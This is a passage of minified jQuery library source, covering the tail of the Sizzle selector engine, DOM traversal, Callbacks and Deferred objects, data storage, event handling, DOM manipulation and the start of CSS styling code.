t;return"input"===n.nodeName.toLowerCase()&&"text"===n.type&&(null==(t=n.getAttribute("type"))||"text"===t.toLowerCase())},first:it(function(){return[0]}),last:it(function(n,t){return[t-1]}),eq:it(function(n,t,i){return[i<0?i+t:i]}),even:it(function(n,t){for(var i=0;i<t;i+=2)n.push(i);return n}),odd:it(function(n,t){for(var i=1;i<t;i+=2)n.push(i);return n}),lt:it(function(n,t,i){for(var r=i<0?i+t:i;--r>=0;)n.push(r);return n}),gt:it(function(n,t,i){for(var r=i<0?i+t:i;++r<t;)n.push(r);return n})}}).pseudos.nth=t.pseudos.eq;for(rt in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})t.pseudos[rt]=ar(rt);for(rt in{submit:!0,reset:!0})t.pseudos[rt]=vr(rt);return ki.prototype=t.filters=t.pseudos,t.setFilters=new ki,ft=u.tokenize=function(n,i){var e,f,s,o,r,h,c,l=ci[n+" "];if(l)return i?0:l.slice(0);for(r=n,h=[],c=t.preFilter;r;){(!e||(f=rr.exec(r)))&&(f&&(r=r.slice(f[0].length)||r),h.push(s=[]));e=!1;(f=ur.exec(r))&&(e=f.shift(),s.push({value:e,type:f[0].replace(at," ")}),r=r.slice(e.length));for(o in t.filter)(f=vt[o].exec(r))&&(!c[o]||(f=c[o](f)))&&(e=f.shift(),s.push({value:e,type:o,matches:f}),r=r.slice(e.length));if(!e)break}return i?r.length:r?u.error(n):ci(n,h).slice(0)},bt=u.compile=function(n,t){var r,u=[],e=[],i=lt[n+" "];if(!i){for(t||(t=ft(n)),r=t.length;r--;)(i=ei(t[r]))[f]?u.push(i):e.push(i);(i=lt(n,pr(e,u))).selector=n}return i},si=u.select=function(n,i,r,u){var o,f,e,l,a,c="function"==typeof n&&n,s=!u&&ft(n=c.selector||n);if(r=r||[],1===s.length){if((f=s[0]=s[0].slice(0)).length>2&&"ID"===(e=f[0]).type&&9===i.nodeType&&h&&t.relative[f[1].type]){if(!(i=(t.find.ID(e.matches[0].replace(y,p),i)||[])[0]))return r;c&&(i=i.parentNode);n=n.slice(f.shift().value.length)}for(o=vt.needsContext.test(n)?0:f.length;o--;){if(e=f[o],t.relative[l=e.type])break;if((a=t.find[l])&&(u=a(e.matches[0].replace(y,p),ni.test(f[0].type)&&ri(i.parentNode)||i))){if(f.splice(o,1),!(n=u.length&&yt(f)))return k.apply(r,u),r;break}}}return(c||bt(n,s))(u,i,!h,r,!i||ni.test(n)&&ri(i.parentNode)||i),r},e.sortStable=f.split("").sort(kt).join("")===f,e.detectDuplicates=!!ut,b(),e.sortDetached=a(function(n){return 1&n.compareDocumentPosition(i.createElement("fieldset"))}),a(function(n){return n.innerHTML="<a href='#'><\/a>","#"===n.firstChild.getAttribute("href")})||ii("type|href|height|width",function(n,t,i){if(!i)return n.getAttribute(t,"type"===t.toLowerCase()?1:2)}),e.attributes&&a(function(n){return n.innerHTML="<input/>",n.firstChild.setAttribute("value",""),""===n.firstChild.getAttribute("value")})||ii("value",function(n,t,i){if(!i&&"input"===n.nodeName.toLowerCase())return n.defaultValue}),a(function(n){return null==n.getAttribute("disabled")})||ii(dt,function(n,t,i){var r;if(!i)return!0===n[t]?t.toLowerCase():(r=n.getAttributeNode(t))&&r.specified?r.value:null}),u}(n);i.find=b;i.expr=b.selectors;i.expr[":"]=i.expr.pseudos;i.uniqueSort=i.unique=b.uniqueSort;i.text=b.getText;i.isXMLDoc=b.isXML;i.contains=b.contains;i.escapeSelector=b.escape;var rt=function(n,t,r){for(var u=[],f=void 0!==r;(n=n[t])&&9!==n.nodeType;)if(1===n.nodeType){if(f&&i(n).is(r))break;u.push(n)}return u},cr=function(n,t){for(var i=[];n;n=n.nextSibling)1===n.nodeType&&n!==t&&i.push(n);return i},lr=i.expr.match.needsContext;ci=/^<([a-z][^\/\0>:\x20\t\r\n\f]*)[\x20\t\r\n\f]*\/?>(?:<\/\1>|)$/i;i.filter=function(n,t,r){var u=t[0];return r&&(n=":not("+n+")"),1===t.length&&1===u.nodeType?i.find.matchesSelector(u,n)?[u]:[]:i.find.matches(n,i.grep(t,function(n){return 1===n.nodeType}))};i.fn.extend({find:function(n){var t,r,u=this.length,f=this;if("string"!=typeof n)return this.pushStack(i(n).filter(function(){for(t=0;t<u;t++)if(i.contains(f[t],this))return!0}));for(r=this.pushStack([]),t=0;t<u;t++)i.find(n,f[t],r);return u>1?i.uniqueSort(r):r},filter:function(n){return this.pushStack(li(this,n||[],!1))},not:function(n){return this.pushStack(li(this,n||[],!0))},is:function(n){return!!li(this,"string"==typeof n&&lr.test(n)?i(n):n||[],!1).length}});vr=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]+))$/;(i.fn.init=function(n,t,r){var e,o;if(!n)return this;if(r=r||ar,"string"==typeof n){if(!(e="<"===n[0]&&">"===n[n.length-1]&&n.length>=3?[null,n,null]:vr.exec(n))||!e[1]&&t)return!t||t.jquery?(t||r).find(n):this.constructor(t).find(n);if(e[1]){if(t=t instanceof i?t[0]:t,i.merge(this,i.parseHTML(e[1],t&&t.nodeType?t.ownerDocument||t:f,!0)),ci.test(e[1])&&i.isPlainObject(t))for(e in t)u(this[e])?this[e](t[e]):this.attr(e,t[e]);return this}return(o=f.getElementById(e[2]))&&(this[0]=o,this.length=1),this}return n.nodeType?(this[0]=n,this.length=1,this):u(n)?void 0!==r.ready?r.ready(n):n(i):i.makeArray(n,this)}).prototype=i.fn;ar=i(f);yr=/^(?:parents|prev(?:Until|All))/;pr={children:!0,contents:!0,next:!0,prev:!0};i.fn.extend({has:function(n){var t=i(n,this),r=t.length;return this.filter(function(){for(var n=0;n<r;n++)if(i.contains(this,t[n]))return!0})},closest:function(n,t){var r,f=0,o=this.length,u=[],e="string"!=typeof n&&i(n);if(!lr.test(n))for(;f<o;f++)for(r=this[f];r&&r!==t;r=r.parentNode)if(r.nodeType<11&&(e?e.index(r)>-1:1===r.nodeType&&i.find.matchesSelector(r,n))){u.push(r);break}return this.pushStack(u.length>1?i.uniqueSort(u):u)},index:function(n){return n?"string"==typeof n?wt.call(i(n),this[0]):wt.call(this,n.jquery?n[0]:n):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(n,t){return this.pushStack(i.uniqueSort(i.merge(this.get(),i(n,t))))},addBack:function(n){return this.add(null==n?this.prevObject:this.prevObject.filter(n))}});i.each({parent:function(n){var t=n.parentNode;return t&&11!==t.nodeType?t:null},parents:function(n){return rt(n,"parentNode")},parentsUntil:function(n,t,i){return rt(n,"parentNode",i)},next:function(n){return wr(n,"nextSibling")},prev:function(n){return wr(n,"previousSibling")},nextAll:function(n){return rt(n,"nextSibling")},prevAll:function(n){return rt(n,"previousSibling")},nextUntil:function(n,t,i){return rt(n,"nextSibling",i)},prevUntil:function(n,t,i){return rt(n,"previousSibling",i)},siblings:function(n){return cr((n.parentNode||{}).firstChild,n)},children:function(n){return cr(n.firstChild)},contents:function(n){return v(n,"iframe")?n.contentDocument:(v(n,"template")&&(n=n.content||n),i.merge([],n.childNodes))}},function(n,t){i.fn[n]=function(r,u){var f=i.map(this,t,r);return"Until"!==n.slice(-5)&&(u=r),u&&"string"==typeof u&&(f=i.filter(u,f)),this.length>1&&(pr[n]||i.uniqueSort(f),yr.test(n)&&f.reverse()),this.pushStack(f)}});l=/[^\x20\t\r\n\f]+/g;i.Callbacks=function(n){n="string"==typeof n?ne(n):i.extend({},n);var f,r,c,e,t=[],s=[],o=-1,l=function(){for(e=e||n.once,c=f=!0;s.length;o=-1)for(r=s.shift();++o<t.length;)!1===t[o].apply(r[0],r[1])&&n.stopOnFalse&&(o=t.length,r=!1);n.memory||(r=!1);f=!1;e&&(t=r?[]:"")},h={add:function(){return t&&(r&&!f&&(o=t.length-1,s.push(r)),function f(r){i.each(r,function(i,r){u(r)?n.unique&&h.has(r)||t.push(r):r&&r.length&&"string"!==it(r)&&f(r)})}(arguments),r&&!f&&l()),this},remove:function(){return i.each(arguments,function(n,r){for(var u;(u=i.inArray(r,t,u))>-1;)t.splice(u,1),u<=o&&o--}),this},has:function(n){return n?i.inArray(n,t)>-1:t.length>0},empty:function(){return t&&(t=[]),this},disable:function(){return e=s=[],t=r="",this},disabled:function(){return!t},lock:function(){return e=s=[],r||f||(t=r=""),this},locked:function(){return!!e},fireWith:function(n,t){return e||(t=[n,(t=t||[]).slice?t.slice():t],s.push(t),f||l()),this},fire:function(){return h.fireWith(this,arguments),this},fired:function(){return!!c}};return h};i.extend({Deferred:function(t){var f=[["notify","progress",i.Callbacks("memory"),i.Callbacks("memory"),2],["resolve","done",i.Callbacks("once memory"),i.Callbacks("once memory"),0,"resolved"],["reject","fail",i.Callbacks("once memory"),i.Callbacks("once memory"),1,"rejected"]],o="pending",e={state:function(){return o},always:function(){return r.done(arguments).fail(arguments),this},"catch":function(n){return e.then(null,n)},pipe:function(){var n=arguments;return i.Deferred(function(t){i.each(f,function(i,f){var e=u(n[f[4]])&&n[f[4]];r[f[1]](function(){var n=e&&e.apply(this,arguments);n&&u(n.promise)?n.promise().progress(t.notify).done(t.resolve).fail(t.reject):t[f[0]+"With"](this,e?[n]:arguments)})});n=null}).promise()},then:function(t,r,e){function s(t,r,f,e){return function(){var h=this,c=arguments,a=function(){var n,i;if(!(t<o)){if((n=f.apply(h,c))===r.promise())throw new TypeError("Thenable self-resolution");i=n&&("object"==typeof n||"function"==typeof n)&&n.then;u(i)?e?i.call(n,s(o,r,ut,e),s(o,r,dt,e)):(o++,i.call(n,s(o,r,ut,e),s(o,r,dt,e),s(o,r,ut,r.notifyWith))):(f!==ut&&(h=void 0,c=[n]),(e||r.resolveWith)(h,c))}},l=e?a:function(){try{a()}catch(n){i.Deferred.exceptionHook&&i.Deferred.exceptionHook(n,l.stackTrace);t+1>=o&&(f!==dt&&(h=void 0,c=[n]),r.rejectWith(h,c))}};t?l():(i.Deferred.getStackHook&&(l.stackTrace=i.Deferred.getStackHook()),n.setTimeout(l))}}var o=0;return i.Deferred(function(n){f[0][3].add(s(0,n,u(e)?e:ut,n.notifyWith));f[1][3].add(s(0,n,u(t)?t:ut));f[2][3].add(s(0,n,u(r)?r:dt))}).promise()},promise:function(n){return null!=n?i.extend(n,e):e}},r={};return i.each(f,function(n,t){var i=t[2],u=t[5];e[t[1]]=i.add;u&&i.add(function(){o=u},f[3-n][2].disable,f[3-n][3].disable,f[0][2].lock,f[0][3].lock);i.add(t[3].fire);r[t[0]]=function(){return r[t[0]+"With"](this===r?void 0:this,arguments),this};r[t[0]+"With"]=i.fireWith}),e.promise(r),t&&t.call(r,r),r},when:function(n){var e=arguments.length,t=e,o=Array(t),f=d.call(arguments),r=i.Deferred(),s=function(n){return function(t){o[n]=this;f[n]=arguments.length>1?d.call(arguments):t;--e||r.resolveWith(o,f)}};if(e<=1&&(br(n,r.done(s(t)).resolve,r.reject,!e),"pending"===r.state()||u(f[t]&&f[t].then)))return r.then();while(t--)br(f[t],s(t),r.reject);return r.promise()}});kr=/^(Eval|Internal|Range|Reference|Syntax|Type|URI)Error$/;i.Deferred.exceptionHook=function(t,i){n.console&&n.console.warn&&t&&kr.test(t.name)&&n.console.warn("jQuery.Deferred exception: "+t.message,t.stack,i)};i.readyException=function(t){n.setTimeout(function(){throw t;})};gt=i.Deferred();i.fn.ready=function(n){return gt.then(n)["catch"](function(n){i.readyException(n)}),this};i.extend({isReady:!1,readyWait:1,ready:function(n){(!0===n?--i.readyWait:i.isReady)||(i.isReady=!0,!0!==n&&--i.readyWait>0||gt.resolveWith(f,[i]))}});i.ready.then=gt.then;"complete"===f.readyState||"loading"!==f.readyState&&!f.documentElement.doScroll?n.setTimeout(i.ready):(f.addEventListener("DOMContentLoaded",ni),n.addEventListener("load",ni));var p=function(n,t,r,f,e,o,s){var h=0,l=n.length,c=null==r;if("object"===it(r)){e=!0;for(h in r)p(n,t,h,r[h],!0,o,s)}else if(void 0!==f&&(e=!0,u(f)||(s=!0),c&&(s?(t.call(n,f),t=null):(c=t,t=function(n,t,r){return c.call(i(n),r)})),t))for(;h<l;h++)t(n[h],r,s?f:f.call(n[h],h,t(n[h],r)));return e?n:c?t.call(n):l?t(n[0],r):o},te=/^-ms-/,ie=/-([a-z])/g;lt=function(n){return 1===n.nodeType||9===n.nodeType||!+n.nodeType};at.uid=1;at.prototype={cache:function(n){var t=n[this.expando];return t||(t={},lt(n)&&(n.nodeType?n[this.expando]=t:Object.defineProperty(n,this.expando,{value:t,configurable:!0}))),t},set:function(n,t,i){var r,u=this.cache(n);if("string"==typeof t)u[y(t)]=i;else for(r in t)u[y(r)]=t[r];return u},get:function(n,t){return void 0===t?this.cache(n):n[this.expando]&&n[this.expando][y(t)]},access:function(n,t,i){return void 0===t||t&&"string"==typeof t&&void 0===i?this.get(n,t):(this.set(n,t,i),void 0!==i?i:t)},remove:function(n,t){var u,r=n[this.expando];if(void 0!==r){if(void 0!==t)for(u=(t=Array.isArray(t)?t.map(y):(t=y(t))in r?[t]:t.match(l)||[]).length;u--;)delete r[t[u]];(void 0===t||i.isEmptyObject(r))&&(n.nodeType?n[this.expando]=void 0:delete n[this.expando])}},hasData:function(n){var t=n[this.expando];return void 0!==t&&!i.isEmptyObject(t)}};var r=new at,o=new at,ue=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,fe=/[A-Z]/g;i.extend({hasData:function(n){return o.hasData(n)||r.hasData(n)},data:function(n,t,i){return o.access(n,t,i)},removeData:function(n,t){o.remove(n,t)},_data:function(n,t,i){return r.access(n,t,i)},_removeData:function(n,t){r.remove(n,t)}});i.fn.extend({data:function(n,t){var f,u,e,i=this[0],s=i&&i.attributes;if(void 0===n){if(this.length&&(e=o.get(i),1===i.nodeType&&!r.get(i,"hasDataAttrs"))){for(f=s.length;f--;)s[f]&&0===(u=s[f].name).indexOf("data-")&&(u=y(u.slice(5)),dr(i,u,e[u]));r.set(i,"hasDataAttrs",!0)}return e}return"object"==typeof n?this.each(function(){o.set(this,n)}):p(this,function(t){var r;if(i&&void 0===t){if(void 0!==(r=o.get(i,n))||void 0!==(r=dr(i,n)))return r}else this.each(function(){o.set(this,n,t)})},null,t,arguments.length>1,null,!0)},removeData:function(n){return this.each(function(){o.remove(this,n)})}});i.extend({queue:function(n,t,u){var f;if(n)return t=(t||"fx")+"queue",f=r.get(n,t),u&&(!f||Array.isArray(u)?f=r.access(n,t,i.makeArray(u)):f.push(u)),f||[]},dequeue:function(n,t){t=t||"fx";var r=i.queue(n,t),e=r.length,u=r.shift(),f=i._queueHooks(n,t),o=function(){i.dequeue(n,t)};"inprogress"===u&&(u=r.shift(),e--);u&&("fx"===t&&r.unshift("inprogress"),delete f.stop,u.call(n,o,f));!e&&f&&f.empty.fire()},_queueHooks:function(n,t){var u=t+"queueHooks";return r.get(n,u)||r.access(n,u,{empty:i.Callbacks("once memory").add(function(){r.remove(n,[t+"queue",u])})})}});i.fn.extend({queue:function(n,t){var r=2;return"string"!=typeof n&&(t=n,n="fx",r--),arguments.length<r?i.queue(this[0],n):void 0===t?this:this.each(function(){var r=i.queue(this,n,t);i._queueHooks(this,n);"fx"===n&&"inprogress"!==r[0]&&i.dequeue(this,n)})},dequeue:function(n){return this.each(function(){i.dequeue(this,n)})},clearQueue:function(n){return this.queue(n||"fx",[])},promise:function(n,t){var u,e=1,o=i.Deferred(),f=this,s=this.length,h=function(){--e||o.resolveWith(f,[f])};for("string"!=typeof n&&(t=n,n=void 0),n=n||"fx";s--;)(u=r.get(f[s],n+"queueHooks"))&&u.empty&&(e++,u.empty.add(h));return h(),o.promise(t)}});var gr=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,vt=new RegExp("^(?:([+-])=|)("+gr+")([a-z%]*)$","i"),w=["Top","Right","Bottom","Left"],ti=function(n,t){return"none"===(n=t||n).style.display||""===n.style.display&&i.contains(n.ownerDocument,n)&&"none"===i.css(n,"display")},nu=function(n,t,i,r){var f,u,e={};for(u in t)e[u]=n.style[u],n.style[u]=t[u];f=i.apply(n,r||[]);for(u in t)n.style[u]=e[u];return f};ai={};i.fn.extend({show:function(){return ft(this,!0)},hide:function(){return ft(this)},toggle:function(n){return"boolean"==typeof n?n?this.show():this.hide():this.each(function(){ti(this)?i(this).show():i(this).hide()})}});var iu=/^(?:checkbox|radio)$/i,ru=/<([a-z][^\/\0>\x20\t\r\n\f]+)/i,uu=/^$|^module$|\/(?:java|ecma)script/i,c={option:[1,"<select multiple='multiple'>","<\/select>"],thead:[1,"<table>","<\/table>"],col:[2,"<table><colgroup>","<\/colgroup><\/table>"],tr:[2,"<table><tbody>","<\/tbody><\/table>"],td:[3,"<table><tbody><tr>","<\/tr><\/tbody><\/table>"],_default:[0,"",""]};c.optgroup=c.option;c.tbody=c.tfoot=c.colgroup=c.caption=c.thead;c.th=c.td;fu=/<|&#?\w+;/;!function(){var n=f.createDocumentFragment().appendChild(f.createElement("div")),t=f.createElement("input");t.setAttribute("type","radio");t.setAttribute("checked","checked");t.setAttribute("name","t");n.appendChild(t);e.checkClone=n.cloneNode(!0).cloneNode(!0).lastChild.checked;n.innerHTML="<textarea>x<\/textarea>";e.noCloneChecked=!!n.cloneNode(!0).lastChild.defaultValue}();var ii=f.documentElement,se=/^key/,he=/^(?:mouse|pointer|contextmenu|drag|drop)|click/,ou=/^([^.]*)(?:\.(.+)|)/;i.event={global:{},add:function(n,t,u,f,e){var p,v,k,y,w,h,s,c,o,b,d,a=r.get(n);if(a)for(u.handler&&(u=(p=u).handler,e=p.selector),e&&i.find.matchesSelector(ii,e),u.guid||(u.guid=i.guid++),(y=a.events)||(y=a.events={}),(v=a.handle)||(v=a.handle=function(t){if("undefined"!=typeof i&&i.event.triggered!==t.type)return i.event.dispatch.apply(n,arguments)}),w=(t=(t||"").match(l)||[""]).length;w--;)o=d=(k=ou.exec(t[w])||[])[1],b=(k[2]||"").split(".").sort(),o&&(s=i.event.special[o]||{},o=(e?s.delegateType:s.bindType)||o,s=i.event.special[o]||{},h=i.extend({type:o,origType:d,data:f,handler:u,guid:u.guid,selector:e,needsContext:e&&i.expr.match.needsContext.test(e),namespace:b.join(".")},p),(c=y[o])||((c=y[o]=[]).delegateCount=0,s.setup&&!1!==s.setup.call(n,f,b,v)||n.addEventListener&&n.addEventListener(o,v)),s.add&&(s.add.call(n,h),h.handler.guid||(h.handler.guid=u.guid)),e?c.splice(c.delegateCount++,0,h):c.push(h),i.event.global[o]=!0)},remove:function(n,t,u,f,e){var y,k,h,v,p,s,c,a,o,b,d,w=r.hasData(n)&&r.get(n);if(w&&(v=w.events)){for(p=(t=(t||"").match(l)||[""]).length;p--;)if(h=ou.exec(t[p])||[],o=d=h[1],b=(h[2]||"").split(".").sort(),o){for(c=i.event.special[o]||{},a=v[o=(f?c.delegateType:c.bindType)||o]||[],h=h[2]&&new RegExp("(^|\\.)"+b.join("\\.(?:.*\\.|)")+"(\\.|$)"),k=y=a.length;y--;)s=a[y],!e&&d!==s.origType||u&&u.guid!==s.guid||h&&!h.test(s.namespace)||f&&f!==s.selector&&("**"!==f||!s.selector)||(a.splice(y,1),s.selector&&a.delegateCount--,c.remove&&c.remove.call(n,s));k&&!a.length&&(c.teardown&&!1!==c.teardown.call(n,b,w.handle)||i.removeEvent(n,o,w.handle),delete v[o])}else for(o in v)i.event.remove(n,o+t[p],u,f,!0);i.isEmptyObject(v)&&r.remove(n,"handle events")}},dispatch:function(n){var t=i.event.fix(n),u,h,c,e,f,l,s=new Array(arguments.length),a=(r.get(this,"events")||{})[t.type]||[],o=i.event.special[t.type]||{};for(s[0]=t,u=1;u<arguments.length;u++)s[u]=arguments[u];if(t.delegateTarget=this,!o.preDispatch||!1!==o.preDispatch.call(this,t)){for(l=i.event.handlers.call(this,t,a),u=0;(e=l[u++])&&!t.isPropagationStopped();)for(t.currentTarget=e.elem,h=0;(f=e.handlers[h++])&&!t.isImmediatePropagationStopped();)t.rnamespace&&!t.rnamespace.test(f.namespace)||(t.handleObj=f,t.data=f.data,void 0!==(c=((i.event.special[f.origType]||{}).handle||f.handler).apply(e.elem,s))&&!1===(t.result=c)&&(t.preventDefault(),t.stopPropagation()));return o.postDispatch&&o.postDispatch.call(this,t),t.result}},handlers:function(n,t){var f,h,u,e,o,c=[],s=t.delegateCount,r=n.target;if(s&&r.nodeType&&!("click"===n.type&&n.button>=1))for(;r!==this;r=r.parentNode||this)if(1===r.nodeType&&("click"!==n.type||!0!==r.disabled)){for(e=[],o={},f=0;f<s;f++)void 0===o[u=(h=t[f]).selector+" "]&&(o[u]=h.needsContext?i(u,this).index(r)>-1:i.find(u,this,null,[r]).length),o[u]&&e.push(h);e.length&&c.push({elem:r,handlers:e})}return r=this,s<t.length&&c.push({elem:r,handlers:t.slice(s)}),c},addProp:function(n,t){Object.defineProperty(i.Event.prototype,n,{enumerable:!0,configurable:!0,get:u(t)?function(){if(this.originalEvent)return t(this.originalEvent)}:function(){if(this.originalEvent)return this.originalEvent[n]},set:function(t){Object.defineProperty(this,n,{enumerable:!0,configurable:!0,writable:!0,value:t})}})},fix:function(n){return n[i.expando]?n:new i.Event(n)},special:{load:{noBubble:!0},focus:{trigger:function(){if(this!==su()&&this.focus)return this.focus(),!1},delegateType:"focusin"},blur:{trigger:function(){if(this===su()&&this.blur)return this.blur(),!1},delegateType:"focusout"},click:{trigger:function(){if("checkbox"===this.type&&this.click&&v(this,"input"))return this.click(),!1},_default:function(n){return v(n.target,"a")}},beforeunload:{postDispatch:function(n){void 0!==n.result&&n.originalEvent&&(n.originalEvent.returnValue=n.result)}}}};i.removeEvent=function(n,t,i){n.removeEventListener&&n.removeEventListener(t,i)};i.Event=function(n,t){if(!(this instanceof i.Event))return new i.Event(n,t);n&&n.type?(this.originalEvent=n,this.type=n.type,this.isDefaultPrevented=n.defaultPrevented||void 0===n.defaultPrevented&&!1===n.returnValue?ri:et,this.target=n.target&&3===n.target.nodeType?n.target.parentNode:n.target,this.currentTarget=n.currentTarget,this.relatedTarget=n.relatedTarget):this.type=n;t&&i.extend(this,t);this.timeStamp=n&&n.timeStamp||Date.now();this[i.expando]=!0};i.Event.prototype={constructor:i.Event,isDefaultPrevented:et,isPropagationStopped:et,isImmediatePropagationStopped:et,isSimulated:!1,preventDefault:function(){var n=this.originalEvent;this.isDefaultPrevented=ri;n&&!this.isSimulated&&n.preventDefault()},stopPropagation:function(){var n=this.originalEvent;this.isPropagationStopped=ri;n&&!this.isSimulated&&n.stopPropagation()},stopImmediatePropagation:function(){var n=this.originalEvent;this.isImmediatePropagationStopped=ri;n&&!this.isSimulated&&n.stopImmediatePropagation();this.stopPropagation()}};i.each({altKey:!0,bubbles:!0,cancelable:!0,changedTouches:!0,ctrlKey:!0,detail:!0,eventPhase:!0,metaKey:!0,pageX:!0,pageY:!0,shiftKey:!0,view:!0,char:!0,charCode:!0,key:!0,keyCode:!0,button:!0,buttons:!0,clientX:!0,clientY:!0,offsetX:!0,offsetY:!0,pointerId:!0,pointerType:!0,screenX:!0,screenY:!0,targetTouches:!0,toElement:!0,touches:!0,which:function(n){var t=n.button;return null==n.which&&se.test(n.type)?null!=n.charCode?n.charCode:n.keyCode:!n.which&&void 0!==t&&he.test(n.type)?1&t?1:2&t?3:4&t?2:0:n.which}},i.event.addProp);i.each({mouseenter:"mouseover",mouseleave:"mouseout",pointerenter:"pointerover",pointerleave:"pointerout"},function(n,t){i.event.special[n]={delegateType:t,bindType:t,handle:function(n){var u,f=this,r=n.relatedTarget,e=n.handleObj;return r&&(r===f||i.contains(f,r))||(n.type=e.origType,u=e.handler.apply(this,arguments),n.type=t),u}}});i.fn.extend({on:function(n,t,i,r){return yi(this,n,t,i,r)},one:function(n,t,i,r){return yi(this,n,t,i,r,1)},off:function(n,t,r){var u,f;if(n&&n.preventDefault&&n.handleObj)return u=n.handleObj,i(n.delegateTarget).off(u.namespace?u.origType+"."+u.namespace:u.origType,u.selector,u.handler),this;if("object"==typeof n){for(f in n)this.off(f,t,n[f]);return this}return!1!==t&&"function"!=typeof t||(r=t,t=void 0),!1===r&&(r=et),this.each(function(){i.event.remove(this,n,r,t)})}});var ce=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi,le=/<script|<style|<link/i,ae=/checked\s*(?:[^=]|=\s*.checked.)/i,ve=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g;i.extend({htmlPrefilter:function(n){return n.replace(ce,"<$1><\/$2>")},clone:function(n,t,r){var u,c,o,f,h=n.cloneNode(!0),l=i.contains(n.ownerDocument,n);if(!(e.noCloneChecked||1!==n.nodeType&&11!==n.nodeType||i.isXMLDoc(n)))for(f=s(h),u=0,c=(o=s(n)).length;u<c;u++)we(o[u],f[u]);if(t)if(r)for(o=o||s(n),f=f||s(h),u=0,c=o.length;u<c;u++)cu(o[u],f[u]);else cu(n,h);return(f=s(h,"script")).length>0&&vi(f,!l&&s(n,"script")),h},cleanData:function(n){for(var u,t,f,s=i.event.special,e=0;void 0!==(t=n[e]);e++)if(lt(t)){if(u=t[r.expando]){if(u.events)for(f in u.events)s[f]?i.event.remove(t,f):i.removeEvent(t,f,u.handle);t[r.expando]=void 0}t[o.expando]&&(t[o.expando]=void 0)}}});i.fn.extend({detach:function(n){return lu(this,n,!0)},remove:function(n){return lu(this,n)},text:function(n){return p(this,function(n){return void 0===n?i.text(this):this.empty().each(function(){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||(this.textContent=n)})},null,n,arguments.length)},append:function(){return ot(this,arguments,function(n){1!==this.nodeType&&11!==this.nodeType&&9!==this.nodeType||hu(this,n).appendChild(n)})},prepend:function(){return ot(this,arguments,function(n){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=hu(this,n);t.insertBefore(n,t.firstChild)}})},before:function(){return ot(this,arguments,function(n){this.parentNode&&this.parentNode.insertBefore(n,this)})},after:function(){return ot(this,arguments,function(n){this.parentNode&&this.parentNode.insertBefore(n,this.nextSibling)})},empty:function(){for(var n,t=0;null!=(n=this[t]);t++)1===n.nodeType&&(i.cleanData(s(n,!1)),n.textContent="");return this},clone:function(n,t){return n=null!=n&&n,t=null==t?n:t,this.map(function(){return i.clone(this,n,t)})},html:function(n){return p(this,function(n){var t=this[0]||{},r=0,u=this.length;if(void 0===n&&1===t.nodeType)return t.innerHTML;if("string"==typeof n&&!le.test(n)&&!c[(ru.exec(n)||["",""])[1].toLowerCase()]){n=i.htmlPrefilter(n);try{for(;r<u;r++)1===(t=this[r]||{}).nodeType&&(i.cleanData(s(t,!1)),t.innerHTML=n);t=0}catch(n){}}t&&this.empty().append(n)},null,n,arguments.length)},replaceWith:function(){var n=[];return ot(this,arguments,function(t){var r=this.parentNode;i.inArray(this,n)<0&&(i.cleanData(s(this)),r&&r.replaceChild(t,this))},n)}});i.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(n,t){i.fn[n]=function(n){for(var u,f=[],e=i(n),o=e.length-1,r=0;r<=o;r++)u=r===o?this:this.clone(!0),i(e[r])[t](u),si.apply(f,u.get());return this.pushStack(f)}});var pi=new RegExp("^("+gr+")(?!px)[a-z%]+$","i"),ui=function(t){var i=t.ownerDocument.defaultView;return i&&i.opener||(i=n),i.getComputedStyle(t)},be=new RegExp(w.join("|"),"i");!function(){function r(){if(t){o.style.cssText="position:absolute;left:-11111px;width:60px;margin-top:1px;padding:0;border:0";t.style.cssText="position:relative;display:block;box-sizing:border-box;overflow:scroll;margin:auto;border:1px;padding:1px;width:60%;top:1%";ii.appendChild(o).appendChild(t);var i=n.getComputedStyle(t);s="1%"!==i.top;a=12===u(i.marginLeft);t.style.right="60%";l=36===u(i.right);h=36===u(i.width);t.style.position="absolute";c=36===t.offsetWidth||"absolute";ii.removeChild(o);t=null}}function u(n){return Math.round(parseFloat(n))}var s,h,c,l,a,o=f.createElement("div"),t=f.createElement("div");t.style&&(t.style.backgroundClip="content-box",t.cloneNode(!0).style.backgroundClip="",e.clearCloneStyle="content-box"===t.style.backgroundClip,i.extend(e,{boxSizingReliable:function(){return r(),h},pixelBoxStyles:function(){return r(),l},pixelPosition:function(){return r(),s},reliableMarginLeft:function(){return r(),a},scrollboxSize:function(){return r(),c}}))}();var ke=/^(none|table(?!-c[ea]).+)/,vu=/^--/,de={position:"absolute",visibility:"hidden",display:"block"},yu={letterSpacing:"0",fontWeight:"400"},pu=["Webkit","Moz","ms"],wu=f.createElement("div").style;i.extend({cssHooks:{opacity:{get:function(n,t){if(t){var i=yt(n,"opacity");return""===i?"1":i}}}},cssNumber:{animationIterationCount:!0,columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{},style:function(n,t,r,u){if(n&&3!==n.nodeType&&8!==n.nodeType&&n.style){var f,h,o,c=y(t),l=vu.test(t),s=n.style;if(l||(t=bu(c)),o=i.cssHooks[t]||i.cssHooks[c],void 0===r)return o&&"get"in o&&void 0!==(f=o.get(n,!1,u))?f:s[t];"string"==(h=typeof r)&&(f=vt.exec(r))&&f[1]&&(r=tu(n,t,f),h="number");null!=r&&r===r&&("number"===h&&(r+=f&&f[3]||(i.cssNumber[c]?"":"px")),e.clearCloneStyle||""!==r||0!==t.indexOf("background")||(s[t]="inherit"),o&&"set"in o&&void 0===(r=o.set(n,r,u))||(l?s.setProperty(t,r):s[t]=r))}},css:function(n,t,r,u){var f,e,o,s=y(t);return vu.test(t)||(t=bu(s)),(o=i.cssHooks[t]||i.cssHooks[s])&&"get"in o&&(f=o.get(n,!0,r)),void 0===f&&(f=yt(n,t,u)),"normal"===f&&t in 